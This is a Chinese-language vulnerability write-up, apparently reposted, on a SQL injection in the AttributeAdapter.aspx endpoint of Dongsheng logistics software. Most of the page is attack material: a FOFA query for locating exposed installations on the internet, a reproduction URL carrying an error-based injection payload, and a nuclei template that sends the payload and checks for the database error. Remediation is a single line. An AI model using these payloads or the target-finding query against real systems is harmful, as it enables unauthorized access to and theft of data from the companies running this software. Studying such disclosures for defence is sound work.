当前位置: 首页 > news >正文

东胜物流软件AttributeAdapter.aspx存在SQL注入漏洞

免责声明

本文章仅供学习与交流,请勿用于非法用途,均由使用者本人负责,文章作者不为此承担任何责任

漏洞描述

在AttributeAdapter.aspx接口处存在sql注入漏洞,攻击者可以通过此漏洞获取敏感信息
在这里插入图片描述

fofa

body="FeeCodes/CompanysAdapter.aspx" || body="dhtmlxcombo_whp.js" || body="dongshengsoft" || body="theme/dhtmlxcombo.css"

漏洞复现

http://ip/FeeCodes/AttributeAdapter.aspx?handle=attrinfo&attrid=1%27%20and%201=@@version%20--

在这里插入图片描述

nuclei

id: sql-inject-dongshengwuliu-AttributeAdapterinfo:name: '东胜物流软件AttributeAdapter.aspxSQL注入'author: 'xl'severity: severityhttp:- raw:- |+GET //FeeCodes/AttributeAdapter.aspx?handle=attrinfo&attrid=1%27%20and%201=@@version%20-- HTTP/1.1Host: {{Hostname}}Accept-Language: zh-CN,zh;q=0.9Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brConnection: keep-alivematchers-condition: andmatchers:- type: binarypart: bodybinary:- 20e580bc20274d6963726f736f66742053514c20- type: statusstatus:- 500

修复建议

更新到最新版本


http://www.mrgr.cn/news/70220.html

相关文章:

  • 网络物理隔离技术
  • 雷池waf安装并部署防护站点
  • 聊天服务器(4)CMake
  • 【ubuntu】Geogebra
  • 本溪与深圳市新零售产业互联协会共商世界酒中国菜湾区农业发展
  • 网络安全-Linux基础(bash脚本)
  • [DEBUG]AttributeError: module ‘numpy‘ has no attribute ‘bool‘?
  • Scott Brinker:科技巨头裁员?大公司都在积极招聘Martech人才
  • JVM学习之路(5)垃圾回收
  • 大数据-218 Prometheus 插件 exporter 与 pushgateway 配置使用 监控服务 使用场景
  • HyperWorks进阶教程:OptiStruct材料和分析类型
  • 个人图书馆
  • 【A+B】
  • hive分区表
  • 学习threejs,导入STL格式的模型
  • 美国All氧气传感器PSR-12-223在厌氧培养箱微量氧监控的应用
  • 浅谈PostGIS中的抽稀技术——实现高效空间数据可视化的关键
  • 计算机毕业设计 | springboot+vue汽车修理管理系统 汽修厂系统(附源码)
  • 右值引用——C++11新特性(一)
  • 量化交易系统开发-实时行情自动化交易-3.4.1.7.A股大资金动力指标
  • 古城焕新颜!苏州金龙新V系客车加速赋能丽江文旅品质升级
  • 详解MySQL安装
  • tomcat与servlet版本对应关系
  • 华为OD机试 - 幸运数字(Java 2024 E卷 100分)
  • 图神经网络实战(20)——时空图神经网络
  • ORB-SLAM2源码学习:Frame.cc: Frame::isInFrustum 判断地图点是否在当前帧的视野范围内